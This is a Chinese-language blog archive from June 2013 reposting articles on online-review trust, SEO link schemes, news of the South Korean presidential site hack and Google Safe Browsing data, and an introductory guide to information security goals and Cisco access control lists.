2013年6月28日 星期五

2013研究顯示79%的消費者信任網路評價意見

2013研究顯示79%的消費者信任網路評價意見

ZMOT的消費者行為已經成為現代人的消費模式,也就是消費者在尚未接觸到商品以前,就已經透過網路獲得許多與產品相關的資訊。並且研究顯示79%的消費者信任網路評價意見,這個研究告訴我們什麼? 並且可能有什麼是消費者必須注意的陷阱 ...

這篇"2013 Study: 79% Of Consumers Trust Online Reviews As Much As Personal Recommendations"文章提到,一份在地消費者研究報告於近三年的研究結果顯示,越來越高比例的消費者認為網路評價意見跟朋友的意見同樣的可以信賴。

今年的研究期間在2013年的1月到2月,研究對象為3600位居住於美國與加拿大的消費者,詢問的問題有14個題目,獲得2100份的回覆,其中90%都是居住在美國。

以下是這份研究報告中,較為顯著的幾項結果,完整的報告可以由此下載

1. Do You Read Online Customer Reviews To Determine Whether A Local Business Is A Good Business?

-- 85% of consumers say that they read online reviews for local businesses (up from 76% in 2012)

你是否閱讀網路的客戶意見來判斷在地商家的好壞? 其中85%會閱讀網路的客戶意見(2012年為76%)。

經常會閱讀網路客戶意見的比例,自2011年~2013年也是持續成長,如下圖。


2. How Many Online Reviews Do You Read Before You Feel That You Can Trust That Business?

-- 67% of consumers read 6 reviews or less* (up from 52% in 2012)

-- Fewer consumers are reading more than 7 reviews – 22% vs. 35% in 2012

在你信任商家之前,你會閱讀多少網路評價意見? 大部分都集中在2至6個左右,如下圖。


3. How Do Online Customer Reviews Affect Your Opinion Of A Local Business?

-- 73% of consumers say positive customer reviews make them trust a business more (up from 58% in 2012)

-- Only 12% of consumers said they take no notice of online reviews (down from 17% in 2012)

網路評價意見會如何影響你對在地商家的看法? 73%會因為正面評價而產生信任,如下圖。


4. In The Last 12 Months, Have You Recommended A Local Business To People You Know By Any Of The Following Methods?

-- Word of mouth remains the primary route for recommending a local business (72%)
-- Facebook and Twitter are growing strongly as recommendation channels
-- Only 8% of consumers recommended a business on local directories (down from 11% in 2012)

在過去12個月中,你是否向認識的人以下列的方式推薦在地商家? 72%使用口碑方式,第二名是Facebook,如下圖。


5. Do You Trust Online Customer Reviews As Much As Personal Recommendations?

-- 79% of consumers trust online reviews as much as personal recommendations (up from 72% in 2012)
-- Only 21% said they do not trust online reviews as much as personal recommendations

你是否信任網路評價意見高於認識的人的推薦? 79%的消費者信任網路評價意見,如下圖。


再根據年齡進行分析,年輕族群較容易相信網路評價意見,如下圖。


上述的研究結果雖然不能完全反應台灣的情況,但是應該可以當成重要參考。因為台灣沒看到類似的研究,目前只看到稍微接近的是台灣創市際的研究~2012年06月 數位相機篇

研究方法:線上調查 (IX Survey線上研究整合系統)
研究對象:台灣地區10-79歲的網友
研究期間:2012/06/01~2012/06/02
總樣本數:共回收3,165份有效樣本


上面統計資料,選擇特定品牌數位相機的原因中,親友推薦/網友推薦佔16.1%。而藉由哪種管道獲知數位相機的相關資訊問題上,親友的經驗分享佔了30.9%,網路論壇/討論區佔了25.5%。

我們再來看看,這個2011年06月 創市際數位相機篇的統計資料。

研究方法:線上調查 (IX Survey線上研究整合系統)
研究對象:台灣地區10-79歲的網友
研究期間:2011/06/03~2011/06/04
總樣本數:共回收3,587份有效樣本


上面統計資料,挑選數位相機品牌的因素,親友推薦/網友推薦佔17.5%。獲得相機相關資訊的管道,親友的經驗分享佔了29.5%,網路論壇/討論區佔了22.4%。

比較2011年與2012年的資料,挑選數位相機品牌的因素中,親友推薦/網友推薦由17.5%下降到16.1%。獲得相機相關資訊的管道中,親友的經驗分享由29.5%上升到30.9%,網路論壇/討論區由22.4%上升到25.5%。

為何親友推薦/網友推薦反而比例下降,是比較有趣的問題,很可能因為台灣的問卷中,挑選數位相機品牌的因素其中有一項「品牌形象佳」,是否會因為「親友推薦/網友推薦」的因素而受到影響消費者的品牌認知,並不清楚。

不過至少「親友的經驗分享」,「網路論壇/討論區」也都呈現出上升趨勢,與ZMOT的消費者模式一致。

在消費者普遍越來越依賴網路評價意見的同時,應該多多思考一件事,就是網路評價意見的造假。雖然先前只有三星寫手門,但是還有許多網路假評價,都還持續潛藏在網路上影響消費者,這是值得注意的現象。

轉載自《台灣搜尋引擎優化與行銷研究院》

2013年6月27日 星期四

什麼是低品質的目錄網站(Web Directory)?

什麼是低品質的目錄網站(Web Directory)?

在很久以前,大家都鼓勵網站要把網址送到目錄網站(Web Directory),但是當Google自己取消了自己的目錄之後 (參考訊息),目錄網站已經逐漸的不再需要,現在你反而需要知道~如果你的網站被低品質的目錄網站連結,你應該趕緊通知移除 ...

什麼是低品質的目錄網站(Web Directory)? 有兩個判斷要點:

(1) 這個目錄網站本身有沒有流量? 如果透過Alexa檢視結果,流量很低就是低品質的目錄網站。

(2) 這個目錄網站有沒有人會去登錄? 是否看起來就是一個垃圾網站? 如果沒有人會去登錄,又不會讓人想去拜訪的話,就是低品質的目錄網站。

沒有人登錄、又沒有人會去瀏覽的網站,既不會帶給你流量,也不能帶給你搜尋優勢,最好不要跟這種目錄網站有任何關連。

因為Google Penguin Update之後,各種以人為惡意操作來影響搜尋排名的行為,都陸續會被找出來處罰,而低品質的目錄網站連結,就是被處罰的高危險群。

這篇"Are Directory Links Still Worth Doing?"說到,目錄網站的連結是否還值得做? 是許多人的疑問。作者建議以Quality(品質)與Relevance(相關性)來研究,也就是有品質並且相關的目錄網站連結還是值得的。但是大多數的目錄網站都是屬於低品質的,所以把連結建立放在這種類型上,必須小心為之。

這篇"Negative SEO果真已經成為操作策略?"跟這篇"Link Removal Fees From Web Directories"也說到,甚至於還有惡劣的目錄網站自己收集網址登錄後,你必須支付費用,才會把你的連結拿掉。也就是經營一個爛網站,靠著網址移除費用來賺錢。

但是這類網站在Google與Bing推出連結移除工具之後,已經慢慢地無法騙錢了。

Bing連結移除工具 (如下圖),進入Bing管理工具之後,由設定我的網站 > 拒絕接受連結:


Google連結移除工具 (如下圖):


但是要使用這些Disavow Link Tool之前,請先閱讀~再談Disavow Links Tool,請謹慎使用! 所說的: Matt Cutts再三強調,Disavow Links Tool不是用來拒絕外來連結的「唯一」方式,他是拒絕外來連結的「最後」方式,也就是當你嘗試連絡外來網站移除連結,以及其他方式都沒有辦法之後,才是使用Disavow Links Tool的時機。

也許大家可以試想看看,以前在Dmoz上可以被列入目錄,大多認為對於搜尋排名是有幫助的,但是現在呢? 如果連Dmoz的連結都不太有用處,其他的目錄網站就可想而知了。

但是儘管如此,許多黑帽SEO操作者還是都會想要操作一個自己可以操控的目錄網站,因為他們會認為這樣產生連結最快。其實這種操作手法不但很容易穿幫,而且效果已經越來越低。

總而言之,如果有低品質的目錄網站連結連到你的網站,你應該想辦法去除。如果你發現你的SEO公司也在操作低品質的目錄網站,你應該要趕緊離他們遠一點。

轉載自《台灣搜尋引擎優化與行銷研究院》

Bing如何看待Link Farm與Like Farm?

Bing如何看待Link Farm與Like Farm?

了解Google的連結規範之後,我們再來看看Bing對於Link Farm與Like Farm的看法吧。這兩個類型的spam,Bing的看法是否跟Google一樣呢?

在這篇"Link farms and Like farms – don’t be tempted"談到,說連結農場 (Link Farm) 就是建立連結到你的網頁的服務,而按讚農場 (Like Farm) 就是社交網路上類似連結農場的另外一種形式的人為操作。

但是這種Like Farm一樣會有pattern會被抓出來,如下圖很多疑似作假的like就會顯現出來:


Bing對於Like Farm的處理就是如果疑似作假的like,就會直接忽略,所以讚半天等於白費功夫。

在Bing的Link Building解釋文章中說,連結應該是「他人」覺得你的網頁內容有其連結的價值,然後在他的網頁上建立連結連到你的網頁,這就是Bing所認為的「自然連結」(Organic links)。

自然連結才是形成整個網際網路,讓人流連的最主要原因。如果網際網路上大半都是「人為連結」,每個連結的目的都是商業性質的,應該會讓很多人降低點選的意願。

Bing認為以下的方式都是不符合規範的作法:

(1) RECIPROCAL LINKING 互易連結/交換連結

這種你連我的網站、我連你的網站的作法,Bing說這種連結並沒有太大的價值。雖然新的站台會使用這種方式來宣傳以引進流量,並讓更多人知道你的網站,但是這種連結方式並不是適當的連結作法。

其實現在的網路生態,就算新站也不需要以交換連結來宣傳了,反而交換連結根本不會有太多人去點選,如果使用社交網路來宣傳新站,如果有不錯的內容,反而會比交換連結來得有效果。

(2) BUYING LINKS 購買連結

Bing說購買連結有一個pattern很容易被偵測出來,就是購買連結的網站A會一陣子開始出現在某個銷售連結的網站甲,然後過陣子不見了,換成購買連結的網站B出現在網站甲,而網站A又出現在另外一個銷售連結的網站乙。如此這般的型態,就可以很清楚的知道,網站A與B都是購買連結的網站。

當然這只是其中一個購買連結的型態,另外一個型態就是購買的連結大多出現在sidewide上,也就以側邊欄方式出現在整站的網頁上。

Bing說在流量大的網站購買連結,也是無可厚非的一種合理的商業行為,但是還是會讓Bing認為你有意圖想操作搜尋排名。這點也許Bing可以學習Google的NoFollow,如果在流量大的網站購買連結,加上NoFollow就可以成為合法的行為,應該是不錯的方式。

所以目前Bing告訴你購買連結有風險,但是沒有告訴你該怎麼辦。

(3) LINK FARMS 連結農場

Bing說: "any form of link sharing scheme designed to link sites together with the intent of manipulating organic search rankings. Typical link farms have hundreds or thousands of links to websites ... " 任何為了操縱自然搜尋排名的連結方式都是連結農場,大多連結農場都會以上百或上千的連結連到網站 ...

所以在Bing的定義中,大量製造人為連結以操縱自然搜尋排名的連結方式都是連結農場

在最近的內容"Links, Likes and Le Retweets"中, Bing又談到了同樣的問題,也是相同的看法,你製作了人為連結,不管是交換連結或是購買連結,如果你的目的是操作自然搜尋排名,那只是浪費時間與金錢,而like與retweet也是一樣的道理。

轉載自《台灣搜尋引擎優化與行銷研究院》

《APT 攻擊駭客攻擊手法模擬》原來駭客就是這樣跟我一起上班的!!

《APT 攻擊駭客攻擊手法模擬》原來駭客就是這樣跟我一起上班的!!

社交工程攻擊(Social Engineer)過程重現

駭客寄發了惡意信件給目標攻擊對象後,會發生什麼事?受害者打開信中的 Word 附件時,為何就等同跟駭客報到?後門程式開始同步控制你的電腦跟你一起上班,共用同­一台電腦,你還沒看完文件,駭客卻抓了很多珍貴的資料,包含密碼,請看精彩模擬示範。


影片提供者:趨勢科技
轉載自《Youtube》

APT攻擊:一場沒有中立國的戰爭(真實案例模擬)

APT攻擊:一場沒有中立國的戰爭(真實案例模擬)

本片為APT攻擊(Advanced Persistent Threats) 真實案例改編,看歹徒如何不斷進行測試攻擊,直到取得合法身分入侵網路,讓企業蒙受鉅­額損失。

70%公司沒辦法解決這類的攻擊,為了全方面了解目標攻擊對象,駭客鎖定目標攻擊者的­財務狀況、 社交活動等細節,還要列出所有部們和員工名單,甚至要知道員工會不會在網路上討論老闆­。當然網路的邊界防禦措施和對外的網路連線系統,是必要的調查條件。

片中2:37 駭客刻意在鎖定目標的辦公大樓前,刻意丟置一個動過手腳的USB隨身碟,猜猜看會發生什麼事?


影片提供者:趨勢科技
轉載自《Youtube》

韓戰63周年,南韓青瓦台官網遭駭,雲端儲存服務軟體成駭客工具

韓戰63周年,南韓青瓦台官網遭駭,雲端儲存服務軟體成駭客工具

藉自動更新系統散佈惡意程式 建立殭屍大軍,企業及政府請盡快建置重要主機異動監控機制

南韓最高政治中心青瓦台網站於昨日爆發網站遭受駭客攻擊,導致網頁被置換並關閉事件,引起全球矚目。根據趨勢科技全球病毒防治中心Trend Labs的最新研究發現,韓國雲端儲存服務軟體「SimDisk 」伺服器在此波攻擊中疑似遭駭客攻擊並置入檔名為「SimDiskup exe.」的惡意程式,其透過自動更新系統散佈至使用者端,試圖造成大量的感染,成為受駭客控制的網路「殭屍大軍」,進一步發動DDoS 攻擊試圖癱瘓政府網站。

南韓總統府網站在韓戰周年紀念日遭駭,寫著「偉大的統領金正恩將軍萬歲」。

韓國總統府青瓦台的官網於6月25日上午8時30分許遭到駭客攻擊後,有段時間然無法正常訪問,寫著“系統繁忙正在緊急維護”的字樣

根據趨勢科技Trend Labs最新分析發現,駭客攻擊韓國雲端儲存服務廠商「SimDisk」的伺服器並取得控制權後,即置換「SimDisk exe.」執行檔,並透過自動更新系統散佈一隻名為「SimDiskup exe.」的惡意程式至使用者端,一旦更新下載完成,此裝置將遭惡意程式感染,該惡意程式會連回特定網址接收指令,並下載另一隻名為DDOS_DIDKR.A的惡意程式,以培養網路「殭屍大軍」,並運用這些受感染裝置針對政府網站發動DDoS攻擊,癱瘓目標網站。


趨勢科技資深顧問簡勝財表示:「這次的攻擊手法鎖定伺服器弱點,在取得伺服器控制權後方能透過樞紐系統,如自動更新系統可快速而廣泛的散佈至使用者端。我們強烈建議政府機構與企業應該重視伺服器資安維護,並同步進行自身IT資安能力檢測,以避免成為此波或下波攻擊的受害者。同時,當企業或一般消費者在下載使用這類免付費軟體前應審慎思考其安全性,才能將受駭機率降到最低。」

面對Anonymous匿名者駭客組織發動的全球性攻擊,趨勢科技建議雲端服務商、企業與政府可加強對網路流量、Login日誌以及伺服器等的監控,將企業內外部的資訊流量與行為透明化,並於企業內部的重要主機建立檔案異動監控機制,並確保企業內伺服器與IT系統都已經更新俱備最新防護。

Anonymous匿名者駭客組織的事件回顧:
Anonymous攻陷美國司法部USSC網站
Anonymous攻陷英國內政部網站
美國「影子CIA」遭Anonymous入侵
專家:菲國網站開發缺乏嚴謹標準
駭客公布Norton防毒軟體程式碼
反陸審查網路 駭客攻擊不停手

轉載自《雲端運算與網路安全趨勢部落格》

資料奇蹟 解碼你的消費者 Yahoo!產業洞察大公開

資料奇蹟 解碼你的消費者 Yahoo!產業洞察大公開

 2013年,網路廣告持續成長,在行動廣告的成長趨勢更是有驚人的幅度。而Yahoo!奇摩除了針對產業趨勢分析、與客戶分享之外,消費者的網路行為、消費需求變化,如何影響產業變動,更是不可不知的市場走向。

2013產業趨勢:從數位廣告、網路行為與消費趨勢看起

根據IDC統計,台灣、香港自2009年到2013年,整體在網路廣告投資每年的複合成長率達20%,相較傳統媒體來得高很多,預估未來三年也都會有這樣的成長趨勢;而在2016年後,行動廣告與傳統的展示型廣告幾乎可達到旗鼓相當的趨勢,雖然目前仍以PC廣告為主,但行動廣告從今年開始預估有驚人成長,發展潛力不容忽視。



今年,網路廣告預算花費成長力道最強勁的四個產業包括醫藥、醫美、生技(Pharmaceuticals)、消費性零售商品、食品與飲料(CPG & Food/Beverage)、醫療健康(Health Care)、金融理財(Financial Services),成長率預估超過20%。此外,其他產業成長率平均也都有17-18%以上的成長。

行銷預算分配還在劇烈的改變中

在2013年美國超級盃中,過往投入大量電視廣告預算的品牌商可口可樂(Coco-cola)、聯合利華 (Unilever)、多力多滋(Doritos) 轉而利用網路媒體或社群平台丟出比賽遊戲,在超級杯前先強化消費者對品牌的好感度。 這些品牌利用網路比賽遊戲蒐集、整理、分析消費者的巨量資料,無論是超級杯開打前、開打時或結束後,都可以用來進一步拉攏消費者和提升顧客數 ,顯示網路廣告與傳統廣告預算的投資分配不斷在改變中。

而行動裝置正悄然改變消費習慣,帶動網路行銷另一波的發展。根據尼爾森(Nielsen) 過去三年的消費調查統計發現,台灣消費者雖面臨消費緊縮,但在行動裝置、旅遊、美容保養、寵物與藝文展覽等花費卻逆勢成長。根據2012年「Yahoo!奇摩手機行為大調查」發現,透過手機所閱讀的內容,偏好旅遊、股市理財、3C資訊;更 多消費者希望透過網路購買美容保養與美食特產。在手機購物時,25-34歲的女性常購買美容保養產品與家用品。未來透過手機購物的成長,更可以讓這些產業同步成長。消費型態的轉變讓行動、美容保養、投資理財、旅遊、遊戲產業等等,在網路上同時產生內容與消費的需求。因此結合內容行銷,更可創造大量的商機。

2013年Yahoo!產業洞察計畫

Yahoo! 亞太區行銷研究分析部門,旗下三大團隊,包括Data Insights、Strategic Insights,與Data Solutions,專責研究資料趨勢,並且提出產業和消費洞察分析。

今年度的產業洞察計畫主要有4大目標:

APAC產業大調查:涵蓋亞太區8個國家、16個產業與47個產業類別,針對個別產業、產品類別提供最新趨勢分析,更主要的目的是與業務團隊及客戶分享相關產業的網友行為。

產業白皮書:2013年將針對台灣、香港推出理財、美妝、遊戲白皮書,洞悉特定產業的網友行為及需求。

趨勢研究:追蹤網路最夯的產業趨勢並且提供產業發展方向,和客戶分享網路特定領域的消費者行為。像是針對台灣、香港的行動趨勢、影音趨勢、網友每日行為觀察報告,以及台灣網購趨勢、年輕世代行為報告等分析。

廣告效果研究:協助廣告客戶診斷、優化網路廣告對品牌的影響,並且研究最佳案例和影響因子,提升客戶的廣告效果。除了廣告點擊率外,更讓客戶進一步瞭解廣告對於品牌的知名度、喜好度,以及促購度的提升。

網路趨勢不斷變化,如何貼近消費者的使用習慣、需求模式,是每個廣告主都希望能夠深入瞭解的地方。2013年,除了行動廣告持續看漲、購物模式轉變、內容與消費的需求也在持續互動成長中。如何抓住先機、搶先佈局規劃,並有專業團隊協助分析,才是脫穎而出的致勝關鍵!

轉載自《Yahoo數位行銷專欄》

Google資訊公開報告新增安全瀏覽項目,揭露惡意網站行為分布

Google資訊公開報告新增安全瀏覽項目,揭露惡意網站行為分布

從安全瀏覽項目中,使用者可了解有多少人每周看到來自Safe Browsing的警告、惡意網站在全球的分布情況,以及網站被重複感染的速度。 


原本已提供使用者資料調閱要求及移除要求的Google資訊公開報告(Transparency Report),在本周新增了安全瀏覽(Safe Browsing)項目,以提供全球各地不安全網站的分布情況。

Google是藉由2006年啟動的安全瀏覽專案(Safe Browsing program)來找出不安全的網站,這些不安全的網站包含由駭客掌控的惡意程式網站,以及偽裝成合法網站的詐騙網站,目前全球約有10億人使用Google所提供的Safe Browsing機制,每天檢查數十億個網站,平均一天會發現1萬個不安全的網站。

Google軟體工程師Lucas Ballard表示,從安全瀏覽項目中,使用者可了解有多少人每周看到來自Safe Browsing的警告、惡意網站在全球的分布情況,以及網站被重複感染的速度。例如在今年1月的某一周,Safe Browsing每周偵測到6萬個不安全的網站,惡意程式網站與詐騙網站約各佔一半。

此一安全瀏覽類別進一步依照各地的自治系統(autonomous system,AS)來呈現不安全網站的分布,自治系統指的由單一實體所管理的一個或多個網路,例如ISP、企業或學校皆可被歸類為自治系統。這些自治系統也可輸入自己的代碼來查詢旗下惡意網站的比例。

台灣為例,Google最近3個月在不同自治系統用進行安全瀏覽掃描時,掃描了SEEDNET所管轄的1305個網站,其中有143個屬於惡意程式網站(惡意程式網站比例為11%),掃描台灣學術網路(TANet)的3006個網站中,也發現238個惡意程式網站(8%),掃描台灣大電訊(TFN TW)的4780個網站有241個為惡意程式網站(5%),HINET的1.3萬個網站中也有653個為惡意程式網站(5%)。

這些惡意程式網站可能是發動攻擊的的網站,或者是受到入侵的網站,一般而言,被人侵的網站數量明顯多於發動攻擊的網站。

不過,Google也澄清,該公司的掃描是以尋找惡意程式為主,而且只會掃描每個自治系統的一小部份,代表這些資料並非是全面性的,只是作為參考指標。

轉載自《iThome》

Google:透明度報告新增惡意及釣魚網站數據將促使網站更安全

Google:透明度報告新增惡意及釣魚網站數據將促使網站更安全

Google對外透露針對惡意與釣魚網站的最新調查數據,以及一切都是為了讓人們能認真思考線上安全,並讓網站更加安全的苦心與用意。

google_search

同時該調查資料並彙整至該公司每半年一次的透明度報告中,這意味著該報告能提供Google收到來自於政府當局及法院,對於使用者資料之請求的明確數量,以及來自於著作權所有人及政府之移除請求的明確數據,再加上全球Google服務的流量報告。

惡意及釣魚網站資料之蒐集作業,源自於Google安全瀏覽技術(Safe Browsing technology),該技術是在2006年開發,每日用來檢測數以十億計的URL,以發現不安全的網站。

Google表示,對於所檢測出的不安全網站,會被劃分成兩大類型:其一為惡意網站,亦即會透過程式碼在使用者電腦中安裝惡意程式的網站;另一個則是釣魚網站,亦即會騙取使用者之使用名稱、密碼或其他線上個人資訊的假冒合法網站。

根據Google於週二對外釋出的資料顯示,截至6月16日為止,該公司的安全瀏覽計畫平均每週偵測出近42,000個惡意網站,至於釣魚網站的偵測頻率則大約每週26,000個。

對此,透過這類安全威脅細節數據之提供,Google的想法是,「我們希望能凸顯出Web安全的實際狀況,並促進更安全的網站安全措施,」該公司在其官方報告中指出。

圖片/資料來源:PCWorld
轉載自《網路資訊雜誌》

2013年6月26日 星期三

網管人員基礎必知 資訊安全防護與存取控制

從基本解析企業資安及風險管理
網管人員基礎必知 資訊安全防護與存取控制

網路攻擊日益猖獗,資訊安全維護更顯重要。為提高網管防護意識,本文將介紹資訊安全的目標、防護工作內容以及資訊安全的計畫,並說明如何設定網路存取控制權以提升網路存取的安全性。

資訊安全一直都是許多企業所關注的議題,尤其是2011年台灣通過個資法,以及過去陸陸續續發生大型企業讓許多客戶的個人資料外洩,例如知名的Sony PSP網路等事件,使得許多企業更加重視資訊安全與風險管理這樣的議題。

這篇文章將大致介紹資訊安全領域和風險管理所涵蓋的內容,以及企業應該如何地應對。

資訊安全三大目標

資訊安全包含許多方面,例如網路安全、資料庫安全、檔案存取、作業系統安全、人員權限管理、密碼學等等,無論談到的是哪一種領域,目標都是一致的,資訊安全目標不外乎圍繞在三個方向:

1. 資料可取得性(Availability)
2. 資料完整性(Integrity)
3. 資料機密性(Confidentiality)

▲AIC三角


而這三的方向,稱為AIC三角(Triad)。

資料可取得性(Availability) 

可取得性指的是當需要存取到資料的時候,都能確保資料是可以被取得的。相對的,就是代表要注意資料是不是有被惡意或不小心刪除及毀壞。整體來說,資料可取得性要注意的方向有:人為因素、線路問題、軟體的疏失、硬體毀壞、缺乏技術人員、病毒或是其他各種可能的威脅。

資料完整性(Integrity) 

資料完整性主要注重在資料的正確性(Accuracy),如果資料只是可取得,但是卻缺乏完整性或正確性,這樣也不是我們所期望的。

資料機密性(Confidentiality) 

資料機密性的概念就是要去保護個人資料(Privacy of Information)或秘密性的資料(Secrecy of Information)。這樣的保護甚至可以延伸到防止機密資料被交易這樣的行為。

資訊安全防護工作的迷思 

大部分人都知道資訊安全的防護工作相當重要,但是很多人卻對這樣的防護工作有著幾項錯誤的迷思:

1. 資訊安全防護工作會妨礙企業業務的運行。
2. 資訊安全防護工作既昂貴,功效又不高。
3. 資訊安全防護工作根本不可能做得到。
4. 資訊安全防護工作只要用類似防火牆或防毒軟體就 可以完成。 

我們必須了解,整個資料安全的防護工作,是必須圍繞在業務運作上,也就是同步於業務運作上的需求。至於資訊安全的成本問題,的確是必須要考慮的,但是資訊安全防護工作的種類與層面都很廣泛,要做到哪些方面,以及要做到多深,不是一件簡單就可以敘述的事情。企業必須要衡量投入的預算,但是只要方法正確、方向得宜,功效絕對會很高。

而整個資訊安全防護工作最難的地方,大多都是圍繞在人身上。首先,整個防護工作必須要經過適當的授權與重視,如果在企業中,連老闆…主管等人都不重視,即使投入再多的人力或是資金都是沒有用的。

最後還有一點,就是整個資訊安全必須以主動的態度進行,而不是以被動的態度認為反正還沒有面臨到威脅,因此不需要面面俱到。另外,要明白一點,無論怎樣做,風險都不可能變成零,也就是不可能完全沒有任何的風險,但重點是要如何讓風險降到最低。

資訊安全計畫

經過筆者大致描述資訊安全的目標與迷思後,接下來就來敘述資訊安全計畫所包含的主題:

1. 原則與需求分析(Principles and Requirements)
2. 施行政策(Policy)
3. 組織角色與責任(Organizational Roles and Responsibilities)
4. 風險管理與分析(Risk Management and Analysis)
5. 道德管理(Ethics) 

接著,一個個來做詳細說明。

原則與需求分析

這個主題主要是要了解企業組織在資訊安全上的需求與實行原則。這裡可以分為企業IT的安全需求、組織業務的需求以及IT安全管理三個方面來討論。

企業IT的安全需求 
對企業IT而言,資訊安全解決方案注重兩個層面:

1. 資訊安全解決方案的功能需求
2. 資訊安全解決方案能夠正確地被運行 

第一個層面屬於功能需求(Functional Requirements),一般來說都是注重在解決方案的功能達到怎樣的防護與功能上的控制行為。第二個層面屬於保障需求(Assurance Requirements),確保企業選擇了適當的解決方案,並且要確保解決方案有被正確地運行,而且是有效地運行,有達到企業資訊安全的需求。

唯有同時符合兩個層面的需求,才能算是一個完整的資訊安全解決方案。舉例來說,一個很強的防毒軟體,必須具備威脅偵測、防毒解毒的功能,這些屬於功能需求層面。

另外,防毒軟體也必須針對防毒偵測的過程中,做一些記錄(Logging)的功能,或是以其他方式確保防毒軟體正在正常運行中,這樣才能算是一個完整的資訊安全防護解決方案。

組織業務的需求
以上都是屬於IT安全的需求,至於組織業務的安全需求,可以分為三個部分來探討:

1. 注重於企業組織整體的目標
2. 每一個不同的組織擁有不同的安全需求
3. 資訊安全計畫必須是合理的,而且是有經濟效益 的。 

很明顯地,資訊安全計畫一定要符合企業組織的整體目標,否則資訊安全計畫將會沒有效益。另外,也要明白資訊安全計畫根據不同的企業組織會有很明顯的不同,例如政府單位、軍事單位或是一般的企業單位等等,他們對於資訊安全的看法與需求是截然不同的。

舉例來說,每個組織對於各種資料的保護優先權可能就會不同,所要保護的資料目標物也會不同,即使是同一個產業的不同企業,其資訊安全的需求也不見得相同,因為各個企業可能會有不同的營運流程或是不同的資訊存取流程等等。最後,也是最重要的,當然是所選擇的資訊安全計畫必須達到成本效益。

IT安全管理 
這裡要談的,是組織IT在安全管理的目標。IT安全管理在整個企業組織的管理之中只占一部分。一般來說,對於企業高層而言,IT安全管理這個領域對他們而言過於複雜,過於技術性,因此通常會把整個責任全部交付給IT管理部門。而IT管理部門在工作量上可能已經無法負荷安全上的管理,因為IT部門還會需要負責很多其他的事情上,即使IT部門想要著重在資訊安全上,可能也因為沒有受過適當的訓練或是在職責上沒有適當的分配,而導致整個資訊安全計畫徹底失敗。

根據美國全國網路安全聯盟(National Cyber Security Alliance)的資料指出,美國有47%的小型企業不會提供員工網路安全訓練,其中,也有許多企業不願意提供適當的訓練給IT部門。因此,適當的作法應該要把IT管理整合並納入企業整體的風險分析之中,並且必須確保:

符合AIC三角需求
支援公司的策略和目標

而整個IT安全管理,必須包含下列三個部分:

卓越的領導力(Leadership)
完善的階層組織架構(Structure)
標準的運行流程(Processes)

一般而言,我們都會覺得網路安全管理人員所需要的是技術上的技能,但事實上會需要更多的技能。舉例來說,網路安全管理人員至少要有能力做決策,而且所做出的決策不會被任何的高層所過濾,所做出來的決策也必須能夠讓人信服,因此做決策的人在公司裡面須要有一定的地位。

除此之外,這些網路安全管理人員必須對公司的大小細節很熟悉,例如公司是如何運作、誰會使用哪些資料、如何存取那些資料等等。這些都是領導力所涵蓋的內容。

而階層架構所要提的,是指整個資訊安全管理存在於公司內部各個階層的人員:高層主管將方向(Directions)轉換成為政策(Policies),而一般主管將策略轉換成為標準(Standards)、基準(Baselines)以及方針(Guidelines),而Team Leaders則是將標準、基準以及方針轉換成為流程(Procedures)。最後,一般員工則是實行每一個訂立出來的流程。

從上到下各階層的人員在每個流程,對於整個資訊安全管理都是非常重要的。因此,唯有良好的組織階層架構,才能真正落實良好的資訊安全管理工作。

最後,在執行的流程上,也是有很多細節是需要注意。舉例來說,一般會注意做到以下幾點:

1. 工作輪替(Job rotation)
2. 職權區分(Separation of duties)
3. 最小權力分配(Least privilege)
4. 休假的安排(Mandatory vacations)
5. Brewer-Nash Model
6. 監督(Supervision)
7. 安全稽核和復審(Security audit and review)
8. I/O控制
9. 防毒軟體管理

關於每一項細節,之後有機會再一一介紹。

透過存取控制提升網路安全 

網路安全管理人員必須對公司的大小細節很熟悉,例如公司是如何運作、誰會使用哪些資料、如何存取那些資料等等,這些都是領導力所涵蓋的內容。但其實這些對於網路管理人員來說,也是一個非常大的重點。

如果你是網路管理人員,而職責又必須涵蓋網路安全,那這真的是不可忽略的細節。一旦了解公司內部什麼角色會去使用何種資料之後,就可以對應到什麼網路區段。

接下來,就是透過技術上的設定來提升安全性。技術上最經常使用的就是設定存取控制,也就是限定資料的存取控制權。以下來看看如何做到這樣的控制設定。

存取控制清單簡介

Cisco路由器設備的標準型存取控制清單和延伸型存取控制清單提供了許多功能,其中包含一般的存取控制,同時也提供資料加密以及根據策略自動決定路由的功能(Policy-based Routing)。

存取控制清單,也就是Access Control List,簡稱ACL。顧名思義,存取控制清單就是一個清單,內容包含一些「規則」,也可以視為條件,用來指導Cisco路由器設備如何辨識哪些網路封包,以及要對這些網路封包做哪些動作。

例如,網路管理人員可能想要阻絕某些網路封包,希望只允許某些特定的網路封包,而網路管理人員在Cisco路由器設備上設定好存取控制清單之後,當網路封包通過Cisco路由器設備時,就會依據存取控制清單的內容來決定是否要讓這個網路封包經過。

藉由適當地控制好存取控制清單,網路管理人員就可以過濾網路封包,達到一定的網路安全。

存取控制清單的種類

基本上,存取控制清單分為以下兩種類型:

標準型存取控制清單
延伸型存取控制清單

兩種存取控制清單各有優劣,接著就來分析這兩種存取控制清單的不同之處。

檢查網路封包的條件(Criteria) 

標準型存取控制清單與延伸型存取控制清單最大的不同就在於,標準型會檢查網路封包的來源IP位址,而延伸型存取控制清單則會檢查網路封包的來源IP位址和目的地IP位址。

所能處理的網路協定 

標準型存取控制清單只能針對所有的網路協定來做處理,並不能針對特定的網路協定指定允許或拒絕的動作處理,但是延伸型存取控制清單能夠針對特定的網路協定進行處置。由此看來,延伸型的存取控制清單的能力比較強大,能夠設定的比較多。

表1 通訊埠及其所對應的網路服務 


延伸型存取控制清單中的規則,除了可以指定網路協定外,還能夠在協定後面加上埠的編號,以便指明要套用在怎樣的埠之網路封包。一般而言,網路管理人員都會指明比較常見的埠編號(Well Known Ports),表1列出一些常見的埠編號及其所對應的網路服務。

存取控制清單的識別碼範圍

存取控制清單中,每一條規則都有其特定的識別碼(ID),以便於辨識每一條專屬的存取控制規則,不過標準型存取控制清單和延伸型存取控制清單所使用的識別碼範圍不同。

標準型存取控制清單的識別碼範圍是從1到99以及1300到1999之間,而延伸型存取控制清單的識別碼範圍則是從100到199以及2000到2699。由此可以看出,標準型存取控制清單所能設定的規則數目共有799個,而延伸型存取控制清單所能設定的規則數目一樣也是799個,但是所使用的識別碼範圍是不同的。表2是針對這兩種存取控制清單識別碼的整理。

表2 存取控制清單的識別碼範圍


設定標準型存取控制清單的步驟

這裡介紹比較簡單的標準型存取控制清單,說明如何透過指令來設定,而所介紹的指令分成以下幾個部分:

